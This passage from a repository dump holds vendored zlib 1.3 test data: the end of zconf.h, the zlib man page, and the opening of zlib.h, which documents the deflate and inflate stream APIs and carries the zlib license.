defined(ZLIB_CONST) && !defined(z_const) # define z_const const #else # define z_const #endif #ifdef Z_SOLO # ifdef _WIN64 typedef unsigned long long z_size_t; # else typedef unsigned long z_size_t; # endif #else # define z_longlong long long # if defined(NO_SIZE_T) typedef unsigned NO_SIZE_T z_size_t; # elif defined(STDC) # include typedef size_t z_size_t; # else typedef unsigned long z_size_t; # endif # undef z_longlong #endif /* Maximum value for memLevel in deflateInit2 */ #ifndef MAX_MEM_LEVEL # ifdef MAXSEG_64K # define MAX_MEM_LEVEL 8 # else # define MAX_MEM_LEVEL 9 # endif #endif /* Maximum value for windowBits in deflateInit2 and inflateInit2. * WARNING: reducing MAX_WBITS makes minigzip unable to extract .gz files * created by gzip. (Files created by minigzip can still be extracted by * gzip.) */ #ifndef MAX_WBITS # define MAX_WBITS 15 /* 32K LZ77 window */ #endif /* The memory requirements for deflate are (in bytes): (1 << (windowBits+2)) + (1 << (memLevel+9)) that is: 128K for windowBits=15 + 128K for memLevel = 8 (default values) plus a few kilobytes for small objects. For example, if you want to reduce the default memory requirements from 256K to 128K, compile with make CFLAGS="-O -DMAX_WBITS=14 -DMAX_MEM_LEVEL=7" Of course this will generally degrade compression (there's no free lunch). The memory requirements for inflate are (in bytes) 1 << windowBits that is, 32K for windowBits=15 (default value) plus about 7 kilobytes for small objects. */ /* Type declarations */ #ifndef OF /* function prototypes */ # ifdef STDC # define OF(args) args # else # define OF(args) () # endif #endif #ifndef Z_ARG /* function prototypes for stdarg */ # if defined(STDC) || defined(Z_HAVE_STDARG_H) # define Z_ARG(args) args # else # define Z_ARG(args) () # endif #endif /* The following definitions for FAR are needed only for MSDOS mixed * model programming (small or medium model with some far allocations). * This was tested only with MSC; for other MSDOS compilers you may have * to define NO_MEMCPY in zutil.h. If you don't need the mixed model, * just define FAR to be empty. */ #ifdef SYS16BIT # if defined(M_I86SM) || defined(M_I86MM) /* MSC small or medium model */ # define SMALL_MEDIUM # ifdef _MSC_VER # define FAR _far # else # define FAR far # endif # endif # if (defined(__SMALL__) || defined(__MEDIUM__)) /* Turbo C small or medium model */ # define SMALL_MEDIUM # ifdef __BORLANDC__ # define FAR _far # else # define FAR far # endif # endif #endif #if defined(WINDOWS) || defined(WIN32) /* If building or using zlib as a DLL, define ZLIB_DLL. * This is not mandatory, but it offers a little performance increase. */ # ifdef ZLIB_DLL # if defined(WIN32) && (!defined(__BORLANDC__) || (__BORLANDC__ >= 0x500)) # ifdef ZLIB_INTERNAL # define ZEXTERN extern __declspec(dllexport) # else # define ZEXTERN extern __declspec(dllimport) # endif # endif # endif /* ZLIB_DLL */ /* If building or using zlib with the WINAPI/WINAPIV calling convention, * define ZLIB_WINAPI. * Caution: the standard ZLIB1.DLL is NOT compiled using ZLIB_WINAPI. */ # ifdef ZLIB_WINAPI # ifdef FAR # undef FAR # endif # ifndef WIN32_LEAN_AND_MEAN # define WIN32_LEAN_AND_MEAN # endif # include /* No need for _export, use ZLIB.DEF instead. */ /* For complete Windows compatibility, use WINAPI, not __stdcall. */ # define ZEXPORT WINAPI # ifdef WIN32 # define ZEXPORTVA WINAPIV # else # define ZEXPORTVA FAR CDECL # endif # endif #endif #if defined (__BEOS__) # ifdef ZLIB_DLL # ifdef ZLIB_INTERNAL # define ZEXPORT __declspec(dllexport) # define ZEXPORTVA __declspec(dllexport) # else # define ZEXPORT __declspec(dllimport) # define ZEXPORTVA __declspec(dllimport) # endif # endif #endif #ifndef ZEXTERN # define ZEXTERN extern #endif #ifndef ZEXPORT # define ZEXPORT #endif #ifndef ZEXPORTVA # define ZEXPORTVA #endif #ifndef FAR # define FAR #endif #if !defined(__MACTYPES__) typedef unsigned char Byte; /* 8 bits */ #endif typedef unsigned int uInt; /* 16 bits or more */ typedef unsigned long uLong; /* 32 bits or more */ #ifdef SMALL_MEDIUM /* Borland C/C++ and some old MSC versions ignore FAR inside typedef */ # define Bytef Byte FAR #else typedef Byte FAR Bytef; #endif typedef char FAR charf; typedef int FAR intf; typedef uInt FAR uIntf; typedef uLong FAR uLongf; #ifdef STDC typedef void const *voidpc; typedef void FAR *voidpf; typedef void *voidp; #else typedef Byte const *voidpc; typedef Byte FAR *voidpf; typedef Byte *voidp; #endif #if !defined(Z_U4) && !defined(Z_SOLO) && defined(STDC) # include # if (UINT_MAX == 0xffffffffUL) # define Z_U4 unsigned # elif (ULONG_MAX == 0xffffffffUL) # define Z_U4 unsigned long # elif (USHRT_MAX == 0xffffffffUL) # define Z_U4 unsigned short # endif #endif #ifdef Z_U4 typedef Z_U4 z_crc_t; #else typedef unsigned long z_crc_t; #endif #ifdef HAVE_UNISTD_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_UNISTD_H #endif #ifdef HAVE_STDARG_H /* may be set to #if 1 by ./configure */ # define Z_HAVE_STDARG_H #endif #ifdef STDC # ifndef Z_SOLO # include /* for off_t */ # endif #endif #if defined(STDC) || defined(Z_HAVE_STDARG_H) # ifndef Z_SOLO # include /* for va_list */ # endif #endif #ifdef _WIN32 # ifndef Z_SOLO # include /* for wchar_t */ # endif #endif /* a little trick to accommodate both "#define _LARGEFILE64_SOURCE" and * "#define _LARGEFILE64_SOURCE 1" as requesting 64-bit operations, (even * though the former does not conform to the LFS document), but considering * both "#undef _LARGEFILE64_SOURCE" and "#define _LARGEFILE64_SOURCE 0" as * equivalently requesting no 64-bit operations */ #if defined(_LARGEFILE64_SOURCE) && -_LARGEFILE64_SOURCE - -1 == 1 # undef _LARGEFILE64_SOURCE #endif #ifndef Z_HAVE_UNISTD_H # ifdef __WATCOMC__ # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_HAVE_UNISTD_H # if defined(_LARGEFILE64_SOURCE) && !defined(_WIN32) # define Z_HAVE_UNISTD_H # endif #endif #ifndef Z_SOLO # if defined(Z_HAVE_UNISTD_H) # include /* for SEEK_*, off_t, and _LFS64_LARGEFILE */ # ifdef VMS # include /* for off_t */ # endif # ifndef z_off_t # define z_off_t off_t # endif # endif #endif #if defined(_LFS64_LARGEFILE) && _LFS64_LARGEFILE-0 # define Z_LFS64 #endif #if defined(_LARGEFILE64_SOURCE) && defined(Z_LFS64) # define Z_LARGE64 #endif #if defined(_FILE_OFFSET_BITS) && _FILE_OFFSET_BITS-0 == 64 && defined(Z_LFS64) # define Z_WANT64 #endif #if !defined(SEEK_SET) && !defined(Z_SOLO) # define SEEK_SET 0 /* Seek from beginning of file. */ # define SEEK_CUR 1 /* Seek from current position. */ # define SEEK_END 2 /* Set file pointer to EOF plus "offset" */ #endif #ifndef z_off_t # define z_off_t long #endif #if !defined(_WIN32) && defined(Z_LARGE64) # define z_off64_t off64_t #else # if defined(_WIN32) && !defined(__GNUC__) # define z_off64_t __int64 # else # define z_off64_t z_off_t # endif #endif /* MVS linker does not support external names larger than 8 bytes */ #if defined(__MVS__) #pragma map(deflateInit_,"DEIN") #pragma map(deflateInit2_,"DEIN2") #pragma map(deflateEnd,"DEEND") #pragma map(deflateBound,"DEBND") #pragma map(inflateInit_,"ININ") #pragma map(inflateInit2_,"ININ2") #pragma map(inflateEnd,"INEND") #pragma map(inflateSync,"INSY") #pragma map(inflateSetDictionary,"INSEDI") #pragma map(compressBound,"CMBND") #pragma map(inflate_table,"INTABL") #pragma map(inflate_fast,"INFA") #pragma map(inflate_copyright,"INCOPY") #endif #endif /* ZCONF_H */ ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zlib.3 ================================================ .TH ZLIB 3 "18 Aug 2023" .SH NAME zlib \- compression/decompression library .SH SYNOPSIS [see .I zlib.h for full description] .SH DESCRIPTION The .I zlib library is a general purpose data compression library. The code is thread safe, assuming that the standard library functions used are thread safe, such as memory allocation routines. It provides in-memory compression and decompression functions, including integrity checks of the uncompressed data. This version of the library supports only one compression method (deflation) but other algorithms may be added later with the same stream interface. .LP Compression can be done in a single step if the buffers are large enough or can be done by repeated calls of the compression function. In the latter case, the application must provide more input and/or consume the output (providing more output space) before each call. .LP The library also supports reading and writing files in .IR gzip (1) (.gz) format with an interface similar to that of stdio. .LP The library does not install any signal handler. The decoder checks the consistency of the compressed data, so the library should never crash even in the case of corrupted input. .LP All functions of the compression library are documented in the file .IR zlib.h . The distribution source includes examples of use of the library in the files .I test/example.c and .IR test/minigzip.c, as well as other examples in the .IR examples/ directory. .LP Changes to this version are documented in the file .I ChangeLog that accompanies the source. .LP .I zlib is built in to many languages and operating systems, including but not limited to Java, Python, .NET, PHP, Perl, Ruby, Swift, and Go. .LP An experimental package to read and write files in the .zip format, written on top of .I zlib by Gilles Vollant (info@winimage.com), is available at: .IP http://www.winimage.com/zLibDll/minizip.html and also in the .I contrib/minizip directory of the main .I zlib source distribution. .SH "SEE ALSO" The .I zlib web site can be found at: .IP http://zlib.net/ .LP The data format used by the .I zlib library is described by RFC (Request for Comments) 1950 to 1952 in the files: .IP http://tools.ietf.org/html/rfc1950 (for the zlib header and trailer format) .br http://tools.ietf.org/html/rfc1951 (for the deflate compressed data format) .br http://tools.ietf.org/html/rfc1952 (for the gzip header and trailer format) .LP Mark Nelson wrote an article about .I zlib for the Jan. 1997 issue of Dr. Dobb's Journal; a copy of the article is available at: .IP http://marknelson.us/1997/01/01/zlib-engine/ .SH "REPORTING PROBLEMS" Before reporting a problem, please check the .I zlib web site to verify that you have the latest version of .IR zlib ; otherwise, obtain the latest version and see if the problem still exists. Please read the .I zlib FAQ at: .IP http://zlib.net/zlib_faq.html .LP before asking for help. Send questions and/or comments to zlib@gzip.org, or (for the Windows DLL version) to Gilles Vollant (info@winimage.com). .SH AUTHORS AND LICENSE Version 1.3 .LP Copyright (C) 1995-2023 Jean-loup Gailly and Mark Adler .LP This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. .LP Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: .LP .nr step 1 1 .IP \n[step]. 3 The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. .IP \n+[step]. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. .IP \n+[step]. This notice may not be removed or altered from any source distribution. .LP Jean-loup Gailly Mark Adler .br jloup@gzip.org madler@alumni.caltech.edu .LP The deflate format used by .I zlib was defined by Phil Katz. The deflate and .I zlib specifications were written by L. Peter Deutsch. Thanks to all the people who reported problems and suggested various improvements in .IR zlib ; who are too numerous to cite here. .LP UNIX manual page by R. P. C. Rodgers, U.S. National Library of Medicine (rodgers@nlm.nih.gov). .\" end of man page ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/zlib.h ================================================ /* zlib.h -- interface of the 'zlib' general purpose compression library version 1.3, August 18th, 2023 Copyright (C) 1995-2023 Jean-loup Gailly and Mark Adler This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Jean-loup Gailly Mark Adler jloup@gzip.org madler@alumni.caltech.edu The data format used by the zlib library is described by RFCs (Request for Comments) 1950 to 1952 in the files http://tools.ietf.org/html/rfc1950 (zlib format), rfc1951 (deflate format) and rfc1952 (gzip format). */ #ifndef ZLIB_H #define ZLIB_H #include "zconf.h" #ifdef __cplusplus extern "C" { #endif #define ZLIB_VERSION "1.3" #define ZLIB_VERNUM 0x1300 #define ZLIB_VER_MAJOR 1 #define ZLIB_VER_MINOR 3 #define ZLIB_VER_REVISION 0 #define ZLIB_VER_SUBREVISION 0 /* The 'zlib' compression library provides in-memory compression and decompression functions, including integrity checks of the uncompressed data. This version of the library supports only one compression method (deflation) but other algorithms will be added later and will have the same stream interface. Compression can be done in a single step if the buffers are large enough, or can be done by repeated calls of the compression function. In the latter case, the application must provide more input and/or consume the output (providing more output space) before each call. The compressed data format used by default by the in-memory functions is the zlib format, which is a zlib wrapper documented in RFC 1950, wrapped around a deflate stream, which is itself documented in RFC 1951. The library also supports reading and writing files in gzip (.gz) format with an interface similar to that of stdio using the functions that start with "gz". The gzip format is different from the zlib format. gzip is a gzip wrapper, documented in RFC 1952, wrapped around a deflate stream. This library can optionally read and write gzip and raw deflate streams in memory as well. The zlib format was designed to be compact and fast for use in memory and on communications channels. The gzip format was designed for single- file compression on file systems, has a larger header than zlib to maintain directory information, and uses a different, slower check method than zlib. The library does not install any signal handler. The decoder checks the consistency of the compressed data, so the library should never crash even in the case of corrupted input. */ typedef voidpf (*alloc_func)(voidpf opaque, uInt items, uInt size); typedef void (*free_func)(voidpf opaque, voidpf address); struct internal_state; typedef struct z_stream_s { z_const Bytef *next_in; /* next input byte */ uInt avail_in; /* number of bytes available at next_in */ uLong total_in; /* total number of input bytes read so far */ Bytef *next_out; /* next output byte will go here */ uInt avail_out; /* remaining free space at next_out */ uLong total_out; /* total number of bytes output so far */ z_const char *msg; /* last error message, NULL if no error */ struct internal_state FAR *state; /* not visible by applications */ alloc_func zalloc; /* used to allocate the internal state */ free_func zfree; /* used to free the internal state */ voidpf opaque; /* private data object passed to zalloc and zfree */ int data_type; /* best guess about the data type: binary or text for deflate, or the decoding state for inflate */ uLong adler; /* Adler-32 or CRC-32 value of the uncompressed data */ uLong reserved; /* reserved for future use */ } z_stream; typedef z_stream FAR *z_streamp; /* gzip header information passed to and from zlib routines. See RFC 1952 for more details on the meanings of these fields. */ typedef struct gz_header_s { int text; /* true if compressed data believed to be text */ uLong time; /* modification time */ int xflags; /* extra flags (not used when writing a gzip file) */ int os; /* operating system */ Bytef *extra; /* pointer to extra field or Z_NULL if none */ uInt extra_len; /* extra field length (valid if extra != Z_NULL) */ uInt extra_max; /* space at extra (only when reading header) */ Bytef *name; /* pointer to zero-terminated file name or Z_NULL */ uInt name_max; /* space at name (only when reading header) */ Bytef *comment; /* pointer to zero-terminated comment or Z_NULL */ uInt comm_max; /* space at comment (only when reading header) */ int hcrc; /* true if there was or will be a header crc */ int done; /* true when done reading gzip header (not used when writing a gzip file) */ } gz_header; typedef gz_header FAR *gz_headerp; /* The application must update next_in and avail_in when avail_in has dropped to zero. It must update next_out and avail_out when avail_out has dropped to zero. The application must initialize zalloc, zfree and opaque before calling the init function. All other fields are set by the compression library and must not be updated by the application. The opaque value provided by the application will be passed as the first parameter for calls of zalloc and zfree. This can be useful for custom memory management. The compression library attaches no meaning to the opaque value. zalloc must return Z_NULL if there is not enough memory for the object. If zlib is used in a multi-threaded application, zalloc and zfree must be thread safe. In that case, zlib is thread-safe. When zalloc and zfree are Z_NULL on entry to the initialization function, they are set to internal routines that use the standard library functions malloc() and free(). On 16-bit systems, the functions zalloc and zfree must be able to allocate exactly 65536 bytes, but will not be required to allocate more than this if the symbol MAXSEG_64K is defined (see zconf.h). WARNING: On MSDOS, pointers returned by zalloc for objects of exactly 65536 bytes *must* have their offset normalized to zero. The default allocation function provided by this library ensures this (see zutil.c). To reduce memory requirements and avoid any allocation of 64K objects, at the expense of compression ratio, compile the library with -DMAX_WBITS=14 (see zconf.h). The fields total_in and total_out can be used for statistics or progress reports. After compression, total_in holds the total size of the uncompressed data and may be saved for use by the decompressor (particularly if the decompressor wants to decompress everything in a single step). */ /* constants */ #define Z_NO_FLUSH 0 #define Z_PARTIAL_FLUSH 1 #define Z_SYNC_FLUSH 2 #define Z_FULL_FLUSH 3 #define Z_FINISH 4 #define Z_BLOCK 5 #define Z_TREES 6 /* Allowed flush values; see deflate() and inflate() below for details */ #define Z_OK 0 #define Z_STREAM_END 1 #define Z_NEED_DICT 2 #define Z_ERRNO (-1) #define Z_STREAM_ERROR (-2) #define Z_DATA_ERROR (-3) #define Z_MEM_ERROR (-4) #define Z_BUF_ERROR (-5) #define Z_VERSION_ERROR (-6) /* Return codes for the compression/decompression functions. Negative values * are errors, positive values are used for special but normal events. */ #define Z_NO_COMPRESSION 0 #define Z_BEST_SPEED 1 #define Z_BEST_COMPRESSION 9 #define Z_DEFAULT_COMPRESSION (-1) /* compression levels */ #define Z_FILTERED 1 #define Z_HUFFMAN_ONLY 2 #define Z_RLE 3 #define Z_FIXED 4 #define Z_DEFAULT_STRATEGY 0 /* compression strategy; see deflateInit2() below for details */ #define Z_BINARY 0 #define Z_TEXT 1 #define Z_ASCII Z_TEXT /* for compatibility with 1.2.2 and earlier */ #define Z_UNKNOWN 2 /* Possible values of the data_type field for deflate() */ #define Z_DEFLATED 8 /* The deflate compression method (the only one supported in this version) */ #define Z_NULL 0 /* for initializing zalloc, zfree, opaque */ #define zlib_version zlibVersion() /* for compatibility with versions < 1.0.2 */ /* basic functions */ ZEXTERN const char * ZEXPORT zlibVersion(void); /* The application can compare zlibVersion and ZLIB_VERSION for consistency. If the first character differs, the library code actually used is not compatible with the zlib.h header file used by the application. This check is automatically made by deflateInit and inflateInit. */ /* ZEXTERN int ZEXPORT deflateInit(z_streamp strm, int level); Initializes the internal stream state for compression. The fields zalloc, zfree and opaque must be initialized before by the caller. If zalloc and zfree are set to Z_NULL, deflateInit updates them to use default allocation functions. total_in, total_out, adler, and msg are initialized. The compression level must be Z_DEFAULT_COMPRESSION, or between 0 and 9: 1 gives best speed, 9 gives best compression, 0 gives no compression at all (the input data is simply copied a block at a time). Z_DEFAULT_COMPRESSION requests a default compromise between speed and compression (currently equivalent to level 6). deflateInit returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_STREAM_ERROR if level is not a valid compression level, or Z_VERSION_ERROR if the zlib library version (zlib_version) is incompatible with the version assumed by the caller (ZLIB_VERSION). msg is set to null if there is no error message. deflateInit does not perform any compression: this will be done by deflate(). */ ZEXTERN int ZEXPORT deflate(z_streamp strm, int flush); /* deflate compresses as much data as possible, and stops when the input buffer becomes empty or the output buffer becomes full. It may introduce some output latency (reading input without producing any output) except when forced to flush. The detailed semantics are as follows. deflate performs one or both of the following actions: - Compress more input starting at next_in and update next_in and avail_in accordingly. If not all input can be processed (because there is not enough room in the output buffer), next_in and avail_in are updated and processing will resume at this point for the next call of deflate(). - Generate more output starting at next_out and update next_out and avail_out accordingly. This action is forced if the parameter flush is non zero. Forcing flush frequently degrades the compression ratio, so this parameter should be set only when necessary. Some output may be provided even if flush is zero. Before the call of deflate(), the application should ensure that at least one of the actions is possible, by providing more input and/or consuming more output, and updating avail_in or avail_out accordingly; avail_out should never be zero before the call. The application can consume the compressed output when it wants, for example when the output buffer is full (avail_out == 0), or after each call of deflate(). If deflate returns Z_OK and with zero avail_out, it must be called again after making room in the output buffer because there might be more output pending. See deflatePending(), which can be used if desired to determine whether or not there is more output in that case. Normally the parameter flush is set to Z_NO_FLUSH, which allows deflate to decide how much data to accumulate before producing output, in order to maximize compression. If the parameter flush is set to Z_SYNC_FLUSH, all pending output is flushed to the output buffer and the output is aligned on a byte boundary, so that the decompressor can get all input data available so far. (In particular avail_in is zero after the call if enough output space has been provided before the call.) Flushing may degrade compression for some compression algorithms and so it should be used only when necessary. This completes the current deflate block and follows it with an empty stored block that is three bits plus filler bits to the next byte, followed by four bytes (00 00 ff ff). If flush is set to Z_PARTIAL_FLUSH, all pending output is flushed to the output buffer, but the output is not aligned to a byte boundary. All of the input data so far will be available to the decompressor, as for Z_SYNC_FLUSH. This completes the current deflate block and follows it with an empty fixed codes block that is 10 bits long. This assures that enough bytes are output in order for the decompressor to finish the block before the empty fixed codes block. If flush is set to Z_BLOCK, a deflate block is completed and emitted, as for Z_SYNC_FLUSH, but the output is not aligned on a byte boundary, and up to seven bits of the current block are held to be written as the next byte after the next deflate block is completed. In this case, the decompressor may not be provided enough bits at this point in order to complete decompression of the data provided so far to the compressor. It may need to wait for the next block to be emitted. This is for advanced applications that need to control the emission of deflate blocks. If flush is set to Z_FULL_FLUSH, all output is flushed as with Z_SYNC_FLUSH, and the compression state is reset so that decompression can restart from this point if previous compressed data has been damaged or if random access is desired. Using Z_FULL_FLUSH too often can seriously degrade compression. If deflate returns with avail_out == 0, this function must be called again with the same value of the flush parameter and more output space (updated avail_out), until the flush is complete (deflate returns with non-zero avail_out). In the case of a Z_FULL_FLUSH or Z_SYNC_FLUSH, make sure that avail_out is greater than six when the flush marker begins, in order to avoid repeated flush markers upon calling deflate() again when avail_out == 0. If the parameter flush is set to Z_FINISH, pending input is processed, pending output is flushed and deflate returns with Z_STREAM_END if there was enough output space. If deflate returns with Z_OK or Z_BUF_ERROR, this function must be called again with Z_FINISH and more output space (updated avail_out) but no more input data, until it returns with Z_STREAM_END or an error. After deflate has returned Z_STREAM_END, the only possible operations on the stream are deflateReset or deflateEnd. Z_FINISH can be used in the first deflate call after deflateInit if all the compression is to be done in a single step. In order to complete in one call, avail_out must be at least the value returned by deflateBound (see below). Then deflate is guaranteed to return Z_STREAM_END. If not enough output space is provided, deflate will not return Z_STREAM_END, and it must be called again as described above. deflate() sets strm->adler to the Adler-32 checksum of all input read so far (that is, total_in bytes). If a gzip stream is being generated, then strm->adler will be the CRC-32 checksum of the input read so far. (See deflateInit2 below.) deflate() may update strm->data_type if it can make a good guess about the input data type (Z_BINARY or Z_TEXT). If in doubt, the data is considered binary. This field is only for information purposes and does not affect the compression algorithm in any manner. deflate() returns Z_OK if some progress has been made (more input processed or more output produced), Z_STREAM_END if all input has been consumed and all output has been produced (only when flush is set to Z_FINISH), Z_STREAM_ERROR if the stream state was inconsistent (for example if next_in or next_out was Z_NULL or the state was inadvertently written over by the application), or Z_BUF_ERROR if no progress is possible (for example avail_in or avail_out was zero). Note that Z_BUF_ERROR is not fatal, and deflate() can be called again with more input and more output space to continue compressing. */ ZEXTERN int ZEXPORT deflateEnd(z_streamp strm); /* All dynamically allocated data structures for this stream are freed. This function discards any unprocessed input and does not flush any pending output. deflateEnd returns Z_OK if success, Z_STREAM_ERROR if the stream state was inconsistent, Z_DATA_ERROR if the stream was freed prematurely (some input or output was discarded). In the error case, msg may be set but then points to a static string (which must not be deallocated). */ /* ZEXTERN int ZEXPORT inflateInit(z_streamp strm); Initializes the internal stream state for decompression. The fields next_in, avail_in, zalloc, zfree and opaque must be initialized before by the caller. In the current version of inflate, the provided input is not read or consumed. The allocation of a sliding window will be deferred to the first call of inflate (if the decompression does not complete on the first call). If zalloc and zfree are set to Z_NULL, inflateInit updates them to use default allocation functions. total_in, total_out, adler, and msg are initialized. inflateInit returns Z_OK if success, Z_MEM_ERROR if there was not enough memory, Z_VERSION_ERROR if the zlib library version is incompatible with the version assumed by the caller, or Z_STREAM_ERROR if the parameters are invalid, such as a null pointer to the structure. msg is set to null if there is no error message. inflateInit does not perform any decompression. Actual decompression will be done by inflate(). So next_in, and avail_in, next_out, and avail_out are unused and unchanged. The current implementation of inflateInit() does not process any header information -- that is deferred until inflate() is called. */ ZEXTERN int ZEXPORT inflate(z_streamp strm, int flush); /* inflate decompresses as much data as possible, and stops when the input buffer becomes empty or the output buffer becomes full. It may introduce some output latency (reading input without producing any output) except when forced to flush. The detailed semantics are as follows. inflate performs one or both of the following actions: - Decompress more input starting at next_in and update next_in and avail_in accordingly. If not all input can be processed (because there is not enough room in the output buffer), then next_in and avail_in are updated accordingly, and processing will resume at this point for the next call of inflate(). - Generate more output starting at next_out and update next_out and avail_out accordingly. inflate() provides as much output as possible, until there is no more input data or no more space in the output buffer (see below about the flush parameter). Before the call of inflate(), the application should ensure that at least one of the actions is possible, by providing more input and/or consuming more output, and updating the next_* and avail_* values accordingly. If the caller of inflate() does not provide both available input and available output space, it is possible that there will be no progress made. The application can consume the uncompressed output when it wants, for example when the output buffer is full (avail_out == 0), or after each call of inflate(). If inflate returns Z_OK and with zero avail_out, it must be called again after making room in the output buffer because there might be more output pending. The flush parameter of inflate() can be Z_NO_FLUSH, Z_SYNC_FLUSH, Z_FINISH, Z_BLOCK, or Z_TREES. Z_SYNC_FLUSH requests that inflate() flush as much output as possible to the output buffer. Z_BLOCK requests that inflate() stop if and when it gets to the next deflate block boundary. When decoding the zlib or gzip format, this will cause inflate() to return immediately after the header and before the first block. When doing a raw inflate, inflate() will go ahead and process the first block, and will return when it gets to the end of that block, or when it runs out of data. The Z_BLOCK option assists in appending to or combining deflate streams. To assist in this, on return inflate() always sets strm->data_type to the number of unused bits in the last byte taken from strm->next_in, plus 64 if inflate() is currently decoding the last block in the deflate stream, plus 128 if inflate() returned immediately after decoding an end-of-block code or decoding the complete header up to just before the first byte of the deflate stream. The end-of-block will not be indicated until all of the uncompressed data from that block has been written to strm->next_out. The number of unused bits may in general be greater than seven, except when bit 7 of data_type is set, in which case the number of unused bits will be less than eight. data_type is set as noted here every time inflate() returns for all flush options, and so can be used to determine the amount of currently consumed input in bits. The Z_TREES option behaves as Z_BLOCK does, but it also returns when the end of each deflate block header is reached, before any actual data in that block is decoded. This allows the caller to determine the length of the deflate block header for later use in random access within a deflate block. 256 is added to the value of strm->data_type when inflate() returns immediately after reaching the end of the deflate block header. inflate() should normally be called until it returns Z_STREAM_END or an error. However if all decompression is to be performed in a single step (a single call of inflate), the parameter flush should be set to Z_FINISH. In this case all pending input is processed and all pending output is flushed; avail_out must be large enough to hold all of the uncompressed data for the operation to complete. (The size of the uncompressed data may have been saved by the compressor for this purpose.) The use of Z_FINISH is not required to perform an inflation in one step. However it may be used to inform inflate that a faster approach can be used for the single inflate() call. Z_FINISH also informs inflate to not maintain a sliding window if the stream completes, which reduces inflate's memory footprint. If the stream does not complete, either because not all of the stream is provided or not enough output space is provided, then a sliding window will be allocated and inflate() can be called again to continue the operation as if Z_NO_FLUSH had been used. In this implementation, inflate() always flushes as much output as possible to the output buffer, and always uses the faster approach on the first call. So the effects of the flush parameter in this implementation are on the return value of inflate() as noted below, when inflate() returns early when Z_BLOCK or Z_TREES is used, and when inflate() avoids the allocation of memory for a sliding window when Z_FINISH is used. If a preset dictionary is needed after this call (see inflateSetDictionary below), inflate sets strm->adler to the Adler-32 checksum of the dictionary chosen by the compressor and returns Z_NEED_DICT; otherwise it sets strm->adler to the Adler-32 checksum of all output produced so far (that is, total_out bytes) and returns Z_OK, Z_STREAM_END or an error code as described below. At the end of the stream, inflate() checks that its computed Adler-32 checksum is equal to that saved by the compressor and returns Z_STREAM_END only if the checksum is correct. inflate() can decompress and check either zlib-wrapped or gzip-wrapped deflate data. The header type is detected automatically, if requested when initializing with inflateInit2(). Any information contained in the gzip header is not retained unless inflateGetHeader() is used. When processing gzip-wrapped deflate data, strm->adler32 is set to the CRC-32 of the output produced so far. The CRC-32 is checked against the gzip trailer, as is the uncompressed length, modulo 2^32. inflate() returns Z_OK if some progress has been made (more input processed or more output produced), Z_STREAM_END if the end of the compressed data has been reached and all uncompressed output has been produced, Z_NEED_DICT if a preset dictionary is needed at this point, Z_DATA_ERROR if the input data was corrupted (input stream not conforming to the zlib format or incorrect check value, in which case strm->msg points to a string with a more specific error), Z_STREAM_ERROR if the stream structure was inconsistent (for example next_in or next_out was Z_NULL, or the state was inadvertently written over by the application), Z_MEM_ERROR if there was not enough memory, Z_BUF_ERROR if no progress was possible or if there was not enough room in the output buffer when Z_FINISH is used. Note that Z_BUF_ERROR is not fatal, and inflate() can be called again with more input and more output space to continue decompressing. If Z_DATA_ERROR is returned, the application may then call inflateSync() to look for a good compression block if a partial recovery of the data is to be attempted. */ ZEXTERN int ZEXPORT inflateEnd(z_streamp strm); /* All dynamically allocated data structures for this stream are freed. This function discards any unprocessed input and does not flush any pending output. inflateEnd returns Z_OK if success, or Z_STREAM_ERROR if the stream state was inconsistent. */ /* Advanced functions */ /* The following functions are needed only in some special applications. */ /* ZEXTERN int ZEXPORT deflateInit2(z_streamp strm, int level, int method, int windowBits, int memLevel, int strategy); This is another version of deflateInit with more compression options. The fields zalloc, zfree and opaque must be initialized before by the caller. The method parameter is the compression method. It must be Z_DEFLATED in this version of the library. The windowBits parameter is the base two logarithm of the window size (the size of the history buffer). It should be in the range 8..15 for this version of the library. Larger values of this parameter result in better compression at the expense of memory usage. The default value is 15 if deflateInit is used instead. For the current implementation of deflate(), a windowBits value of 8 (a window size of 256 bytes) is not supported. As a result, a request for 8 will result in 9 (a 512-byte window). In that case, providing 8 to inflateInit2() will result in an error when the zlib header with 9 is checked against the initialization of inflate(). The remedy is to not use 8 with deflateInit2() with this initialization, or at least in that case use 9 with inflateInit2(). windowBits can also be -8..-15 for raw deflate. In this case, -windowBits determines the window size. deflate() will then generate raw deflate data with no zlib header or trailer, and will not compute a check value. windowBits can also be greater than 15 for optional gzip encoding. Add 16 to windowBits to write a simple gzip header and trailer around the compressed data instead of a zlib wrapper. The gzip header will have no file name, no extra data, no comment, no modification time (set to zero), no header crc, and the operating system will be set to the appropriate value, if the operating system was determined at compile time. If a gzip stream is being written, strm->adler is a CRC-32 instead of an Adler-32. For raw deflate or gzip encoding, a request for a 256-byte window is rejected as invalid, since only the zlib header provides a means of transmitting the window size to the decompressor. The memLevel parameter specifies how much memory should be allocated for the internal compression state. memLevel=1 uses minimum memory but is slow and reduces compression ratio; memLevel=9 uses maximum memory for optimal speed. The default value is 8. See zconf.h for total memory usage as a function of windowBits and memLevel. The strategy parameter is used to tune the compression algorithm. Use the value Z_DEFAULT_STRATEGY for normal data, Z_FILTERED for data produced by a filter (or predictor), Z_HUFFMAN_ONLY to force Huffman encoding only (no string match), or Z_RLE to limit match distances to one (run-length encoding). Filtered data consists mostly of small values with a somewhat random distribution. In this case, the compression algorithm is tuned to compress them better. The effect of Z_FILTERED is to force more Huffman coding and less string matching; it is somewhat intermediate between Z_DEFAULT_STRATEGY and Z_HUFFMAN_ONLY. Z_RLE is designed to be almost as fast as 